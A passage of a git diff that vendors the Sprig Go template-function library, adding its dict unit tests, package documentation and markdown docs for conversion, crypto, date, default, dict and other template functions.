+			return ""
+		}
+	}
+	return dst
+}
diff --git a/vendor/github.com/Masterminds/sprig/dict_test.go b/vendor/github.com/Masterminds/sprig/dict_test.go
new file mode 100644
index 0000000000..4ceb40a3db
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/dict_test.go
@@ -0,0 +1,175 @@
+package sprig
+
+import (
+	"strings"
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+)
+
+func TestDict(t *testing.T) {
+	tpl := `{{$d := dict 1 2 "three" "four" 5}}{{range $k, $v := $d}}{{$k}}{{$v}}{{end}}`
+	out, err := runRaw(tpl, nil)
+	if err != nil {
+		t.Error(err)
+	}
+	if len(out) != 12 {
+		t.Errorf("Expected length 12, got %d", len(out))
+	}
+	// dict does not guarantee ordering because it is backed by a map.
+	if !strings.Contains(out, "12") {
+		t.Error("Expected grouping 12")
+	}
+	if !strings.Contains(out, "threefour") {
+		t.Error("Expected grouping threefour")
+	}
+	if !strings.Contains(out, "5") {
+		t.Error("Expected 5")
+	}
+	tpl = `{{$t := dict "I" "shot" "the" "albatross"}}{{$t.the}} {{$t.I}}`
+	if err := runt(tpl, "albatross shot"); err != nil {
+		t.Error(err)
+	}
+}
+
+func TestUnset(t *testing.T) {
+	tpl := `{{- $d := dict "one" 1 "two" 222222 -}}
+	{{- $_ := unset $d "two" -}}
+	{{- range $k, $v := $d}}{{$k}}{{$v}}{{- end -}}
+	`
+
+	expect := "one1"
+	if err := runt(tpl, expect); err != nil {
+		t.Error(err)
+	}
+}
+func TestHasKey(t *testing.T) {
+	tpl := `{{- $d := dict "one" 1 "two" 222222 -}}
+	{{- if hasKey $d "one" -}}1{{- end -}}
+	`
+
+	expect := "1"
+	if err := runt(tpl, expect); err != nil {
+		t.Error(err)
+	}
+}
+
+func TestPluck(t *testing.T) {
+	tpl := `
+	{{- $d := dict "one" 1 "two" 222222 -}}
+	{{- $d2 := dict "one" 1 "two" 33333 -}}
+	{{- $d3 := dict "one" 1 -}}
+	{{- $d4 := dict "one" 1 "two" 4444 -}}
+	{{- pluck "two" $d $d2 $d3 $d4 -}}
+	`
+
+	expect := "[222222 33333 4444]"
+	if err := runt(tpl, expect); err != nil {
+		t.Error(err)
+	}
+}
+
+func TestKeys(t *testing.T) {
+	tests := map[string]string{
+		`{{ dict "foo" 1 "bar" 2 | keys | sortAlpha }}`: "[bar foo]",
+		`{{ dict | keys }}`:                             "[]",
+		`{{ keys (dict "foo" 1) (dict "bar" 2) (dict "bar" 3) | uniq | sortAlpha }}`: "[bar foo]",
+	}
+	for tpl, expect := range tests {
+		if err := runt(tpl, expect); err != nil {
+			t.Error(err)
+		}
+	}
+}
+
+func TestPick(t *testing.T) {
+	tests := map[string]string{
+		`{{- $d := dict "one" 1 "two" 222222 }}{{ pick $d "two" | len -}}`:               "1",
+		`{{- $d := dict "one" 1 "two" 222222 }}{{ pick $d "two" -}}`:                     "map[two:222222]",
+		`{{- $d := dict "one" 1 "two" 222222 }}{{ pick $d "one" "two" | len -}}`:         "2",
+		`{{- $d := dict "one" 1 "two" 222222 }}{{ pick $d "one" "two" "three" | len -}}`: "2",
+		`{{- $d := dict }}{{ pick $d "two" | len -}}`:                                    "0",
+	}
+	for tpl, expect := range tests {
+		if err := runt(tpl, expect); err != nil {
+			t.Error(err)
+		}
+	}
+}
+func TestOmit(t *testing.T) {
+	tests := map[string]string{
+		`{{- $d := dict "one" 1 "two" 222222 }}{{ omit $d "one" | len -}}`:         "1",
+		`{{- $d := dict "one" 1 "two" 222222 }}{{ omit $d "one" -}}`:               "map[two:222222]",
+		`{{- $d := dict "one" 1 "two" 222222 }}{{ omit $d "one" "two" | len -}}`:   "0",
+		`{{- $d := dict "one" 1 "two" 222222 }}{{ omit $d "two" "three" | len -}}`: "1",
+		`{{- $d := dict }}{{ omit $d "two" | len -}}`:                              "0",
+	}
+	for tpl, expect := range tests {
+		if err := runt(tpl, expect); err != nil {
+			t.Error(err)
+		}
+	}
+}
+
+func TestSet(t *testing.T) {
+	tpl := `{{- $d := dict "one" 1 "two" 222222 -}}
+	{{- $_ := set $d "two" 2 -}}
+	{{- $_ := set $d "three" 3 -}}
+	{{- if hasKey $d "one" -}}{{$d.one}}{{- end -}}
+	{{- if hasKey $d "two" -}}{{$d.two}}{{- end -}}
+	{{- if hasKey $d "three" -}}{{$d.three}}{{- end -}}
+	`
+
+	expect := "123"
+	if err := runt(tpl, expect); err != nil {
+		t.Error(err)
+	}
+}
+
+func TestMerge(t *testing.T) {
+	dict := map[string]interface{}{
+		"src2": map[string]interface{}{
+			"h": 10,
+			"i": "i",
+			"j": "j",
+		},
+		"src1": map[string]interface{}{
+			"a": 1,
+			"b": 2,
+			"d": map[string]interface{}{
+				"e": "four",
+			},
+			"g": []int{6, 7},
+			"i": "aye",
+			"j": "jay",
+		},
+		"dst": map[string]interface{}{
+			"a": "one",
+			"c": 3,
+			"d": map[string]interface{}{
+				"f": 5,
+			},
+			"g": []int{8, 9},
+			"i": "eye",
+		},
+	}
+	tpl := `{{merge .dst .src1 .src2}}`
+	_, err := runRaw(tpl, dict)
+	if err != nil {
+		t.Error(err)
+	}
+	expected := map[string]interface{}{
+		"a": "one", // key overridden
+		"b": 2,     // merged from src1
+		"c": 3,     // merged from dst
+		"d": map[string]interface{}{ // deep merge
+			"e": "four",
+			"f": 5,
+		},
+		"g": []int{8, 9}, // overridden - arrays are not merged
+		"h": 10,          // merged from src2
+		"i": "eye",       // overridden twice
+		"j": "jay",       // overridden and merged
+	}
+	assert.Equal(t, expected, dict["dst"])
+}
diff --git a/vendor/github.com/Masterminds/sprig/doc.go b/vendor/github.com/Masterminds/sprig/doc.go
new file mode 100644
index 0000000000..92ea318c7e
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/doc.go
@@ -0,0 +1,233 @@
+/*
+Sprig: Template functions for Go.
+
+This package contains a number of utility functions for working with data
+inside of Go `html/template` and `text/template` files.
+
+To add these functions, use the `template.Funcs()` method:
+
+	t := templates.New("foo").Funcs(sprig.FuncMap())
+
+Note that you should add the function map before you parse any template files.
+
+	In several cases, Sprig reverses the order of arguments from the way they
+	appear in the standard library. This is to make it easier to pipe
+	arguments into functions.
+
+Date Functions
+
+	- date FORMAT TIME: Format a date, where a date is an integer type or a time.Time type, and
+	  format is a time.Format formatting string.
+	- dateModify: Given a date, modify it with a duration: `date_modify "-1.5h" now`. If the duration doesn't
+	  parse, it returns the time unaltered. See `time.ParseDuration` for info on duration strings.
+	- now: Current time.Time, for feeding into date-related functions.
+	- htmlDate TIME: Format a date for use in the value field of an HTML "date" form element.
+	- dateInZone FORMAT TIME TZ: Like date, but takes three arguments: format, timestamp,
+	  timezone.
+	- htmlDateInZone TIME TZ: Like htmlDate, but takes two arguments: timestamp,
+	  timezone.
+
+String Functions
+
+	- abbrev: Truncate a string with ellipses. `abbrev 5 "hello world"` yields "he..."
+	- abbrevboth: Abbreviate from both sides, yielding "...lo wo..."
+	- trunc: Truncate a string (no suffix). `trunc 5 "Hello World"` yields "hello".
+	- trim: strings.TrimSpace
+	- trimAll: strings.Trim, but with the argument order reversed `trimAll "$" "$5.00"` or `"$5.00 | trimAll "$"`
+	- trimSuffix: strings.TrimSuffix, but with the argument order reversed: `trimSuffix "-" "ends-with-"`
+	- trimPrefix: strings.TrimPrefix, but with the argument order reversed `trimPrefix "$" "$5"`
+	- upper: strings.ToUpper
+	- lower: strings.ToLower
+	- nospace: Remove all space characters from a string. `nospace "h e l l o"` becomes "hello"
+	- title: strings.Title
+	- untitle: Remove title casing
+	- repeat: strings.Repeat, but with the arguments switched: `repeat count str`. (This simplifies common pipelines)
+	- substr: Given string, start, and length, return a substr.
+	- initials: Given a multi-word string, return the initials. `initials "Matt Butcher"` returns "MB"
+	- randAlphaNum: Given a length, generate a random alphanumeric sequence
+	- randAlpha: Given a length, generate an alphabetic string
+	- randAscii: Given a length, generate a random ASCII string (symbols included)
+	- randNumeric: Given a length, generate a string of digits.
+	- swapcase: SwapCase swaps the case of a string using a word based algorithm. see https://godoc.org/github.com/Masterminds/goutils#SwapCase
+	- shuffle: Shuffle randomizes runes in a string and returns the result. It uses default random source in `math/rand`
+	- snakecase: convert all upper case characters in a string to underscore format.
+	- camelcase: convert all lower case characters behind underscores to upper case character
+	- wrap: Force a line wrap at the given width. `wrap 80 "imagine a longer string"`
+	- wrapWith: Wrap a line at the given length, but using 'sep' instead of a newline. `wrapWith 50, "<br>", $html`
+	- contains: strings.Contains, but with the arguments switched: `contains substr str`. (This simplifies common pipelines)
+	- hasPrefix: strings.hasPrefix, but with the arguments switched
+	- hasSuffix: strings.hasSuffix, but with the arguments switched
+	- quote: Wrap string(s) in double quotation marks, escape the contents by adding '\' before '"'.
+	- squote: Wrap string(s) in double quotation marks, does not escape content.
+	- cat: Concatenate strings, separating them by spaces. `cat $a $b $c`.
+	- indent: Indent a string using space characters. `indent 4 "foo\nbar"` produces "    foo\n    bar"
+	- nindent: Indent a string using space characters and prepend a new line. `indent 4 "foo\nbar"` produces "\n    foo\n    bar"
+	- replace: Replace an old with a new in a string: `$name | replace " " "-"`
+	- plural: Choose singular or plural based on length: `len $fish | plural "one anchovy" "many anchovies"`
+	- sha256sum: Generate a hex encoded sha256 hash of the input
+	- toString: Convert something to a string
+
+String Slice Functions:
+
+	- join: strings.Join, but as `join SEP SLICE`
+	- split: strings.Split, but as `split SEP STRING`. The results are returned
+	  as a map with the indexes set to _N, where N is an integer starting from 0.
+	  Use it like this: `{{$v := "foo/bar/baz" | split "/"}}{{$v._0}}` (Prints `foo`)
+	- splitList: strings.Split, but as `split SEP STRING`. The results are returned
+	  as an array.
+	- toStrings: convert a list to a list of strings. 'list 1 2 3 | toStrings' produces '["1" "2" "3"]'
+	- sortAlpha: sort a list lexicographically.
+
+Integer Slice Functions:
+
+	- until: Given an integer, returns a slice of counting integers from 0 to one
+	  less than the given integer: `range $i, $e := until 5`
+	- untilStep: Given start, stop, and step, return an integer slice starting at
+	  'start', stopping at `stop`, and incrementing by 'step. This is the same
+	  as Python's long-form of 'range'.
+
+Conversions:
+
+	- atoi: Convert a string to an integer. 0 if the integer could not be parsed.
+	- int64: Convert a string or another numeric type to an int64.
+	- int: Convert a string or another numeric type to an int.
+	- float64: Convert a string or another numeric type to a float64.
+
+Defaults:
+
+	- default: Give a default value. Used like this: trim "   "| default "empty".
+	  Since trim produces an empty string, the default value is returned. For
+	  things with a length (strings, slices, maps), len(0) will trigger the default.
+	  For numbers, the value 0 will trigger the default. For booleans, false will
+	  trigger the default. For structs, the default is never returned (there is
+	  no clear empty condition). For everything else, nil value triggers a default.
+	- empty: Return true if the given value is the zero value for its type.
+	  Caveats: structs are always non-empty. This should match the behavior of
+	  {{if pipeline}}, but can be used inside of a pipeline.
+	- coalesce: Given a list of items, return the first non-empty one.
+	  This follows the same rules as 'empty'. '{{ coalesce .someVal 0 "hello" }}`
+	  will return `.someVal` if set, or else return "hello". The 0 is skipped
+	  because it is an empty value.
+	- compact: Return a copy of a list with all of the empty values removed.
+	  'list 0 1 2 "" | compact' will return '[1 2]'
+	- ternary: Given a value,'true | ternary "b" "c"' will return "b".
+	  'false | ternary "b" "c"' will return '"c"'. Similar to the JavaScript ternary
+	  operator.
+
+OS:
+	- env: Resolve an environment variable
+	- expandenv: Expand a string through the environment
+
+File Paths:
+	- base: Return the last element of a path. https://golang.org/pkg/path#Base
+	- dir: Remove the last element of a path. https://golang.org/pkg/path#Dir
+	- clean: Clean a path to the shortest equivalent name.  (e.g. remove "foo/.."
+	  from "foo/../bar.html") https://golang.org/pkg/path#Clean
+	- ext: https://golang.org/pkg/path#Ext
+	- isAbs: https://golang.org/pkg/path#IsAbs
+
+Encoding:
+	- b64enc: Base 64 encode a string.
+	- b64dec: Base 64 decode a string.
+
+Reflection:
+
+	- typeOf: Takes an interface and returns a string representation of the type.
+	  For pointers, this will return a type prefixed with an asterisk(`*`). So
+	  a pointer to type `Foo` will be `*Foo`.
+	- typeIs: Compares an interface with a string name, and returns true if they match.
+	  Note that a pointer will not match a reference. For example `*Foo` will not
+	  match `Foo`.
+	- typeIsLike: Compares an interface with a string name and returns true if
+	  the interface is that `name` or that `*name`. In other words, if the given
+	  value matches the given type or is a pointer to the given type, this returns
+	  true.
+	- kindOf: Takes an interface and returns a string representation of its kind.
+	- kindIs: Returns true if the given string matches the kind of the given interface.
+
+	Note: None of these can test whether or not something implements a given
+	interface, since doing so would require compiling the interface in ahead of
+	time.
+
+Data Structures:
+
+	- tuple: Takes an arbitrary list of items and returns a slice of items. Its
+	  tuple-ish properties are mainly gained through the template idiom, and not
+	  through an API provided here. WARNING: The implementation of tuple will
+	  change in the future.
+	- list: An arbitrary ordered list of items. (This is prefered over tuple.)
+	- dict: Takes a list of name/values and returns a map[string]interface{}.
+	  The first parameter is converted to a string and stored as a key, the
+	  second parameter is treated as the value. And so on, with odds as keys and
+	  evens as values. If the function call ends with an odd, the last key will
+	  be assigned the empty string. Non-string keys are converted to strings as
+	  follows: []byte are converted, fmt.Stringers will have String() called.
+	  errors will have Error() called. All others will be passed through
+	  fmt.Sprintf("%v").
+
+Lists Functions:
+
+These are used to manipulate lists: '{{ list 1 2 3 | reverse | first }}'
+
+	- first: Get the first item in a 'list'. 'list 1 2 3 | first' prints '1'
+	- last: Get the last item in a 'list': 'list 1 2 3 | last ' prints '3'
+	- rest: Get all but the first item in a list: 'list 1 2 3 | rest' returns '[2 3]'
+	- initial: Get all but the last item in a list: 'list 1 2 3 | initial' returns '[1 2]'
+	- append: Add an item to the end of a list: 'append $list 4' adds '4' to the end of '$list'
+	- prepend: Add an item to the beginning of a list: 'prepend $list 4' puts 4 at the beginning of the list.
+	- reverse: Reverse the items in a list.
+	- uniq: Remove duplicates from a list.
+	- without: Return a list with the given values removed: 'without (list 1 2 3) 1' would return '[2 3]'
+	- has: Return 'true' if the item is found in the list: 'has "foo" $list' will return 'true' if the list contains "foo"
+
+Dict Functions:
+
+These are used to manipulate dicts.
+
+	- set: Takes a dict, a key, and a value, and sets that key/value pair in
+	  the dict. `set $dict $key $value`. For convenience, it returns the dict,
+	  even though the dict was modified in place.
+	- unset: Takes a dict and a key, and deletes that key/value pair from the
+	  dict. `unset $dict $key`. This returns the dict for convenience.
+	- hasKey: Takes a dict and a key, and returns boolean true if the key is in
+	  the dict.
+	- pluck: Given a key and one or more maps, get all of the values for that key.
+	- keys: Get an array of all of the keys in one or more dicts.
+	- pick: Select just the given keys out of the dict, and return a new dict.
+	- omit: Return a dict without the given keys.
+
+Math Functions:
+
+Integer functions will convert integers of any width to `int64`. If a
+string is passed in, functions will attempt to convert with
+`strconv.ParseInt(s, 1064)`. If this fails, the value will be treated as 0.
+
+	- add1: Increment an integer by 1
+	- add: Sum an arbitrary number of integers
+	- sub: Subtract the second integer from the first
+	- div: Divide the first integer by the second
+	- mod: Module of first integer divided by second
+	- mul: Multiply integers
+	- max: Return the biggest of a series of one or more integers
+	- min: Return the smallest of a series of one or more integers
+	- biggest: DEPRECATED. Return the biggest of a series of one or more integers
+
+Crypto Functions:
+
+	- genPrivateKey: Generate a private key for the given cryptosystem. If no
+	  argument is supplied, by default it will generate a private key using
+	  the RSA algorithm. Accepted values are `rsa`, `dsa`, and `ecdsa`.
+	- derivePassword: Derive a password from the given parameters according to the ["Master Password" algorithm](http://masterpasswordapp.com/algorithm.html)
+	  Given parameters (in order) are:
+          `counter` (starting with 1), `password_type` (maximum, long, medium, short, basic, or pin), `password`,
+           `user`, and `site`
+
+SemVer Functions:
+
+These functions provide version parsing and comparisons for SemVer 2 version
+strings.
+
+	- semver: Parse a semantic version and return a Version object.
+	- semverCompare: Compare a SemVer range to a particular version.
+*/
+package sprig
diff --git a/vendor/github.com/Masterminds/sprig/docs/_config.yml b/vendor/github.com/Masterminds/sprig/docs/_config.yml
new file mode 100644
index 0000000000..c741881743
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/_config.yml
@@ -0,0 +1 @@
+theme: jekyll-theme-slate
\ No newline at end of file
diff --git a/vendor/github.com/Masterminds/sprig/docs/conversion.md b/vendor/github.com/Masterminds/sprig/docs/conversion.md
new file mode 100644
index 0000000000..06f4f77680
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/conversion.md
@@ -0,0 +1,25 @@
+# Type Conversion Functions
+
+The following type conversion functions are provided by Sprig:
+
+- `atoi`: Convert a string to an integer
+- `float64`: Convert to a float64
+- `int`: Convert to an `int` at the system's width.
+- `int64`: Convert to an `int64`
+- `toString`: Convert to a string
+- `toStrings`: Convert a list, slice, or array to a list of strings.
+
+Only `atoi` requires that the input be a specific type. The others will attempt
+to convert from any type to the destination type. For example, `int64` can convert
+floats to ints, and it can also convert strings to ints.
+
+## toStrings
+
+Given a list-like collection, produce a slice of strings.
+
+```
+list 1 2 3 | toStrings
+```
+
+The above converts `1` to `"1"`, `2` to `"2"`, and so on, and then returns
+them as a list.
diff --git a/vendor/github.com/Masterminds/sprig/docs/crypto.md b/vendor/github.com/Masterminds/sprig/docs/crypto.md
new file mode 100644
index 0000000000..a927a45b78
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/crypto.md
@@ -0,0 +1,133 @@
+# Cryptographic and Security Functions
+
+Sprig provides a couple of advanced cryptographic functions.
+
+## sha1sum
+
+The `sha1sum` function receives a string, and computes it's SHA1 digest.
+
+```
+sha1sum "Hello world!"
+```
+
+## sha256sum
+
+The `sha256sum` function receives a string, and computes it's SHA256 digest.
+
+```
+sha256sum "Hello world!"
+```
+
+The above will compute the SHA 256 sum in an "ASCII armored" format that is
+safe to print.
+
+## derivePassword
+
+The `derivePassword` function can be used to derive a specific password based on
+some shared "master password" constraints. The algorithm for this is
+[well specified](http://masterpasswordapp.com/algorithm.html).
+
+```
+derivePassword 1 "long" "password" "user" "example.com"
+```
+
+Note that it is considered insecure to store the parts directly in the template.
+
+## genPrivateKey
+
+The `genPrivateKey` function generates a new private key encoded into a PEM
+block.
+
+It takes one of the values for its first param:
+
+- `ecdsa`: Generate an elyptical curve DSA key (P256)
+- `dsa`: Generate a DSA key (L2048N256)
+- `rsa`: Generate an RSA 4096 key
+
+## buildCustomCert
+
+The `buildCustomCert` function allows customizing the certificate.
+
+It takes the following string parameters:
+
+- A base64 encoded PEM format certificate
+- A base64 encoded PEM format private key
+
+It returns a certificate object with the following attributes:
+
+- `Cert`: A PEM-encoded certificate
+- `Key`: A PEM-encoded private key
+
+Example:
+
+```
+$ca := buildCustomCert "base64-encoded-ca-key" "base64-encoded-ca-crt"
+```
+
+Note that the returned object can be passed to the `genSignedCert` function
+to sign a certificate using this CA.
+
+## genCA
+
+The `genCA` function generates a new, self-signed x509 certificate authority.
+
+It takes the following parameters:
+
+- Subject's common name (cn)
+- Cert validity duration in days
+
+It returns an object with the following attributes:
+
+- `Cert`: A PEM-encoded certificate
+- `Key`: A PEM-encoded private key
+
+Example:
+
+```
+$ca := genCA "foo-ca" 365
+```
+
+Note that the returned object can be passed to the `genSignedCert` function
+to sign a certificate using this CA.
+
+## genSelfSignedCert
+
+The `genSelfSignedCert` function generates a new, self-signed x509 certificate.
+
+It takes the following parameters:
+
+- Subject's common name (cn)
+- Optional list of IPs; may be nil
+- Optional list of alternate DNS names; may be nil
+- Cert validity duration in days
+
+It returns an object with the following attributes:
+
+- `Cert`: A PEM-encoded certificate
+- `Key`: A PEM-encoded private key
+
+Example:
+
+```
+$cert := genSelfSignedCert "foo.com" (list "10.0.0.1" "10.0.0.2") (list "bar.com" "bat.com") 365
+```
+
+## genSignedCert
+
+The `genSignedCert` function generates a new, x509 certificate signed by the
+specified CA.
+
+It takes the following parameters:
+
+- Subject's common name (cn)
+- Optional list of IPs; may be nil
+- Optional list of alternate DNS names; may be nil
+- Cert validity duration in days
+- CA (see `genCA`)
+
+Example:
+
+```
+$ca := genCA "foo-ca" 365
+$cert := genSignedCert "foo.com" (list "10.0.0.1" "10.0.0.2") (list "bar.com" "bat.com") 365 $ca
+```
diff --git a/vendor/github.com/Masterminds/sprig/docs/date.md b/vendor/github.com/Masterminds/sprig/docs/date.md
new file mode 100644
index 0000000000..9a4f673503
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/date.md
@@ -0,0 +1,88 @@
+# Date Functions
+
+## now
+
+The current date/time. Use this in conjunction with other date functions.
+
+
+## ago
+
+The `ago` function returns duration from time.Now in seconds resolution.
+
+```
+ago .CreatedAt"
+```
+returns in `time.Duration` String() format
+
+```
+2h34m7s
+```
+
+## date
+
+The `date` function formats a date.
+
+
+Format the date to YEAR-MONTH-DAY:
+```
+now | date "2006-01-02"
+```
+
+Date formatting in Go is a [little bit different](https://pauladamsmith.com/blog/2011/05/go_time.html).
+
+In short, take this as the base date:
+
+```
+Mon Jan 2 15:04:05 MST 2006
+```
+
+Write it in the format you want. Above, `2006-01-02` is the same date, but
+in the format we want.
+
+## dateInZone
+
+Same as `date`, but with a timezone.
+
+```
+date "2006-01-02" (now) "UTC"
+```
+
+## dateModify
+
+The `dateModify` takes a modification and a date and returns the timestamp.
+
+Subtract an hour and thirty minutes from the current time:
+
+```
+now | date_modify "-1.5h"
+```
+
+## htmlDate
+
+The `htmlDate` function formates a date for inserting into an HTML date picker
+input field.
+
+```
+now | htmlDate
+```
+
+## htmlDateInZone
+
+Same as htmlDate, but with a timezone.
+
+```
+htmlDate (now) "UTC"
+```
+
+## toDate
+
+`toDate` converts a string to a date. The first argument is the date layout and
+the second the date string. If the string can't be convert it returns the zero
+value.
+
+This is useful when you want to convert a string date to another format
+(using pipe). The example below converts "2017-12-31" to "31/12/2017".
+
+```
+toDate "2006-01-02" "2017-12-31" | date "02/01/2006"
+```
diff --git a/vendor/github.com/Masterminds/sprig/docs/defaults.md b/vendor/github.com/Masterminds/sprig/docs/defaults.md
new file mode 100644
index 0000000000..c0cae90e53
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/defaults.md
@@ -0,0 +1,113 @@
+# Default Functions
+
+Sprig provides tools for setting default values for templates.
+
+## default
+
+To set a simple default value, use `default`:
+
+```
+default "foo" .Bar
+```
+
+In the above, if `.Bar` evaluates to a non-empty value, it will be used. But if
+it is empty, `foo` will be returned instead.
+
+The definition of "empty" depends on type:
+
+- Numeric: 0
+- String: ""
+- Lists: `[]`
+- Dicts: `{}`
+- Boolean: `false`
+- And always `nil` (aka null)
+
+For structs, there is no definition of empty, so a struct will never return the
+default.
+
+## empty
+
+The `empty` function returns `true` if the given value is considered empty, and
+`false` otherwise. The empty values are listed in the `default` section.
+
+```
+empty .Foo
+```
+
+Note that in Go template conditionals, emptiness is calculated for you. Thus,
+you rarely need `if empty .Foo`. Instead, just use `if .Foo`.
+
+## coalesce
+
+The `coalesce` function takes a list of values and returns the first non-empty
+one.
+
+```
+coalesce 0 1 2
+```
+
+The above returns `1`.
+
+This function is useful for scanning through multiple variables or values:
+
+```
+coalesce .name .parent.name "Matt"
+```
+
+The above will first check to see if `.name` is empty. If it is not, it will return
+that value. If it _is_ empty, `coalesce` will evaluate `.parent.name` for emptiness.
+Finally, if both `.name` and `.parent.name` are empty, it will return `Matt`.
+
+## toJson
+
+The `toJson` function encodes an item into a JSON string.
+
+```
+toJson .Item
+```
+
+The above returns JSON string representation of `.Item`.
+
+## toPrettyJson
+
+The `toPrettyJson` function encodes an item into a pretty (indented) JSON string.
+
+```
+toPrettyJson .Item
+```
+
+The above returns indented JSON string representation of `.Item`.
+
+## ternary
+
+The `ternary` function takes two values, and a test value. If the test value is
+true, the first value will be returned. If the test value is empty, the second
+value will be returned. This is similar to the c ternary operator.
+
+### true test value
+
+```
+ternary "foo" "bar" true
+```
+
+or
+
+```
+true | ternary "foo" "bar"
+```
+
+The above returns `"foo"`.
+
+### false test value
+
+```
+ternary "foo" "bar" false
+```
+
+or
+
+```
+false | ternary "foo" "bar"
+```
+
+The above returns `"bar"`.
diff --git a/vendor/github.com/Masterminds/sprig/docs/dicts.md b/vendor/github.com/Masterminds/sprig/docs/dicts.md
new file mode 100644
index 0000000000..cfd3e27a2a
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/dicts.md
@@ -0,0 +1,131 @@
+# Dictionaries and Dict Functions
+
+Sprig provides a key/value storage type called a `dict` (short for "dictionary",
+as in Python). A `dict` is an _unorder_ type.
+
+The key to a dictionary **must be a string**. However, the value can be any
+type, even another `dict` or `list`.
+
+Unlike `list`s, `dict`s are not immutable. The `set` and `unset` functions will
+modify the contents of a dictionary.
+
+## dict
+
+Creating dictionaries is done by calling the `dict` function and passing it a
+list of pairs.
+
+The following creates a dictionary with three items:
+
+```
+$myDict := dict "name1" "value1" "name2" "value2" "name3" "value 3"
+```
+
+## set
+
+Use `set` to add a new key/value pair to a dictionary.
+
+```
+$_ := set $myDict "name4" "value4"
+```
+
+Note that `set` _returns the dictionary_ (a requirement of Go template functions),
+so you may need to trap the value as done above with the `$_` assignment.
+
+## unset
+
+Given a map and a key, delete the key from the map.
+
+```
+$_ := unset $myDict "name4"
+```
+
+As with `set`, this returns the dictionary.
+
+Note that if the key is not found, this operation will simply return. No error
+will be generated.
+
+## hasKey
+
+The `hasKey` function returns `true` if the given dict contains the given key.
+
+```
+hasKey $myDict "name1"
+```
+
+If the key is not found, this returns `false`.
+
+## pluck
+
+The `pluck` function makes it possible to give one key and multiple maps, and
+get a list of all of the matches:
+
+```
+pluck "name1" $myDict $myOtherDict
+```
+
+The above will return a `list` containing every found value (`[value1 otherValue1]`).
+
+If the give key is _not found_ in a map, that map will not have an item in the
+list (and the length of the returned list will be less than the number of dicts
+in the call to `pluck`.
+
+If the key is _found_ but the value is an empty value, that value will be
+inserted.
+
+A common idiom in Sprig templates is to uses `pluck... | first` to get the first
+matching key out of a collection of dictionaries.
+
+## merge
+
+Merge two or more dictionaries into one, giving precedence to the dest dictionary:
+
+```
+$newdict := merge $dest $source1 $source2
+```
+
+This is a deep merge operation.
+
+## keys
+
+The `keys` function will return a `list` of all of the keys in one or more `dict`
+types. Since a dictionary is _unordered_, the keys will not be in a predictable order.
+They can be sorted with `sortAlpha`.
+
+```
+keys $myDict | sortAlpha
+```
+
+When supplying multiple dictionaries, the keys will be concatenated. Use the `uniq`
+function along with `sortAlpha` to get a unqiue, sorted list of keys.
+
+```
+keys $myDict $myOtherDict | uniq | sortAlpha
+```
+
+## pick
+
+The `pick` function selects just the given keys out of a dictionary, creating a
+new `dict`.
+
+```
+$new := pick $myDict "name1" "name3"
+```
+
+The above returns `{name1: value1, name2: value2}`
+
+## omit
+
+The `omit` function is similar to `pick`, except it returns a new `dict` with all
+the keys that _do not_ match the given keys.
+
+```
+$new := omit $myDict "name1" "name3"
+```
+
+The above returns `{name2: value2}`
+
+## A Note on Dict Internals
+
+A `dict` is implemented in Go as a `map[string]interface{}`. Go developers can
+pass `map[string]interface{}` values into the context to make them available
+to templates as `dict`s.
diff --git a/vendor/github.com/Masterminds/sprig/docs/encoding.md b/vendor/github.com/Masterminds/sprig/docs/encoding.md
new file mode 100644
index 0000000000..1c7a36f849
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/encoding.md
@@ -0,0 +1,6 @@
+# Encoding Functions
+
+Sprig has the following encoding and decoding functions:
+
+- `b64enc`/`b64dec`: Encode or decode with Base64
+- `b32enc`/`b32dec`: Encode or decode with Base32
diff --git a/vendor/github.com/Masterminds/sprig/docs/flow_control.md b/vendor/github.com/Masterminds/sprig/docs/flow_control.md
new file mode 100644
index 0000000000..6414640a6a
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/flow_control.md
@@ -0,0 +1,11 @@
+# Flow Control Functions
+
+## fail
+
+Unconditionally returns an empty `string` and an `error` with the specified
+text. This is useful in scenarios where other conditionals have determined that
+template rendering should fail.
+
+```
+fail "Please accept the end user license agreement"
+```
diff --git a/vendor/github.com/Masterminds/sprig/docs/index.md b/vendor/github.com/Masterminds/sprig/docs/index.md
new file mode 100644
index 0000000000..24e17d89cc
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/index.md
@@ -0,0 +1,23 @@
+# Sprig Function Documentation
+
+The Sprig library provides over 70 template functions for Go's template language.
+
+- [String Functions](strings.md): `trim`, `wrap`, `randAlpha`, `plural`, etc.
+  - [String List Functions](string_slice.md): `splitList`, `sortAlpha`, etc.
+- [Math Functions](math.md): `add`, `max`, `mul`, etc.
+  - [Integer Slice Functions](integer_slice.md): `until`, `untilStep`
+- [Date Functions](date.md): `now`, `date`, etc.
+- [Defaults Functions](defaults.md): `default`, `empty`, `coalesce`, `toJson`, `toPrettyJson`
+- [Encoding Functions](encoding.md): `b64enc`, `b64dec`, etc.
+- [Lists and List Functions](lists.md): `list`, `first`, `uniq`, etc.
+- [Dictionaries and Dict Functions](dicts.md): `dict`, `hasKey`, `pluck`, etc.
+- [Type Conversion Functions](conversion.md): `atoi`, `int64`, `toString`, etc.
+- [File Path Functions](paths.md): `base`, `dir`, `ext`, `clean`, `isAbs`
+- [Flow Control Functions](flow_control.md): `fail`
+- Advanced Functions
+  - [UUID Functions](uuid.md): `uuidv4`
+  - [OS Functions](os.md): `env`, `expandenv`
+  - [Version Comparison Functions](semver.md): `semver`, `semverCompare`
+  - [Reflection](reflection.md): `typeOf`, `kindIs`, `typeIsLike`, etc.
+  - [Cryptographic and Security Functions](crypto.md): `derivePassword`, `sha256sum`, `genPrivateKey`
+
diff --git a/vendor/github.com/Masterminds/sprig/docs/integer_slice.md b/vendor/github.com/Masterminds/sprig/docs/integer_slice.md
new file mode 100644
index 0000000000..8929d30363
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/integer_slice.md
@@ -0,0 +1,25 @@
+# Integer Slice Functions
+
+## until
+
+The `until` function builds a range of integers.
+
+```
